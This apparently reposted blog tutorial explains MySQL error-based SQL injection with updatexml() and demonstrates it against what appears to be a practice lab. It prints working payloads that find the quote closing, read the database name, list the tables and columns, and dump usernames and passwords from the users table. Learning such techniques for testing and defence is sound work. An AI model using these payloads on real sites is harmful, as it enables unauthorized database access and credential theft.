Basic knowledge of Mysql - updatexml injection of error injection

Language 2023-04-17 05:48:04 views: null

#introduce

Updatexml() function

Updatexml(XML_Document, Xpath_string, new_value) contains three parameters

The first parameter: XML_Document is in string format, which is the name of the object of the XML document, such as Doc

The second parameter: XPath_string is the path, a string in XPath format

The third parameter: new_value, in string format, replaces the data of the found symbol condition

#updatexml error reporting principle

The error reporting principle of Updatexml is exactly the same as that of extractvalue().

Use select updatexml, and then deliberately write the wrong path when using the path, which will cause his error. When we use it, we also execute a select query before reporting an error, and then wait for the echo after the error is reported. What we echo is the content we want to view.

Note: updatexml, like extracevalue, can only query 32-bit strings, so you still need to use the substring function

# updatexml() injection writing method analysis

and 1=updatexml(1,2,3)

1: Write the first parameter casually

2.concat(1,2)

(1): 0x7e or '~'

(2): (select query statement)

3. Write the third parameter casually

例: and 1=updatexml(1,concat('~',(select database())),3)

#case demo

Use updatexml() to report error injection

1. Determine the character type/digital type, if it is a character type, determine the closing method

Throw a single quotation mark in first, the page is normal

 

Throwing a "double quotation mark in, the page reports an error

Take out the content of the error

'"1"" LIMIT 0,1'

 "1"" LIMIT 0,1

The red double quotes are what we entered

Through the page's echo error report, it is determined that "double quotation marks are used to close the

2. Get the database name

?id=1"  and updatexml(1,concat('~',(select database())),3) --+

Make sure the data is security

3. Get the data table

?id=1" and 1=updatexml(1,concat('~',(select group_concat(table_name)from information_schema.tables where table_schema=database())),3)  --+

data sheet

emails

referers

agents

users

4. Get all field information in the users data table

?id=1" and 1=updatexml(1,concat('~',(select group_concat(column_name)from information_schema.columns where table_name='users' and table_schema=database())),3)--+

 field is

id

username

password

5. Unloading (using the substring function) 

?id=1" and 1=updatexml(1,concat(0x7e,(select substring(group_concat(username,'--',password),1,30)from security.users)),3) --+

If you need to see more user information, you only need to change the last two parameters of substr

The above is the error injection of the character type. If it is a digital type, it is the same, but it does not need to be closed and commented to test directly.

For example?id=1 and=updatexml(1,concat('~',(select databatse())),3)

Guess you like

Origin blog.csdn.net/m0_72755466/article/details/129787780
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com